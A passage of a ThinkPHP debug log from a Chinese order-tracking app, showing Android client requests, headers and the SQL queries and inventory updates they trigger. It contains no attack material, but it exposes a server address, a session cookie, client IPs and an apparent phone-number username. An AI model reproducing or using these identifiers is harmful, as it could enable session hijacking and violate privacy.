] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"152\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"152\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308068) [ RunTime:0.003609s ] --------------------------------------------------------------- [ 2022-07-20T17:07:48+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.053894s][吞吐率:18.55req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001151s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001539s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000597s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001495s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000525s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001832s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001116s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308068>orderinfo.end_time desc,1658308068>orderinfo.end_time desc,1658308068-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.002830s ] --------------------------------------------------------------- [ 2022-07-20T17:07:48+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021623s][吞吐率:46.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:51+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019220s][吞吐率:52.03req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:51+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020625s][吞吐率:48.49req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001233s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:52+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020420s][吞吐率:48.97req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001060s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:53+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021839s][吞吐率:45.79req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001259s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:53+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018545s][吞吐率:53.92req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001040s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:54+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.053207s][吞吐率:18.79req/s] [内存消耗:4,769.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001071s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001781s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000498s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001858s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000425s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001854s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001285s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308074>orderinfo.end_time desc,1658308074>orderinfo.end_time desc,1658308074-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002834s ] --------------------------------------------------------------- [ 2022-07-20T17:07:54+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020270s][吞吐率:49.33req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001172s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:55+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020917s][吞吐率:47.81req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001162s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:55+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029281s][吞吐率:34.15req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001643s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000091s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:55+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019513s][吞吐率:51.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001150s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:56+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.028939s][吞吐率:34.56req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001191s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001828s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:56+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021381s][吞吐率:46.77req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001291s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:56+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020061s][吞吐率:49.85req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001142s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:58+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022417s][吞吐率:44.61req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001311s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:13+08:00 ] 221.192.178.45 POST /api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6576&rukuliang=8621&fpsl=0 [ info ] 47.105.33.115:8081/api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6576&rukuliang=8621&fpsl=0 [运行时间:0.068640s][吞吐率:14.57req/s] [内存消耗:5,065.77kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001205s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'updaterukuliangbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'orderId' => '6576', 'rukuliang' => '8621', 'fpsl' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001527s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->updaterukuliangbyid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000446s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001604s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000436s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001857s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `id` = 6576 LIMIT 1 [ RunTime:0.000668s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001500s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1238 LIMIT 1 [ RunTime:0.000463s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `kucun`=8765,`updatetime`=1658308093 WHERE `id` = 1238 [ RunTime:0.000390s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001431s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS 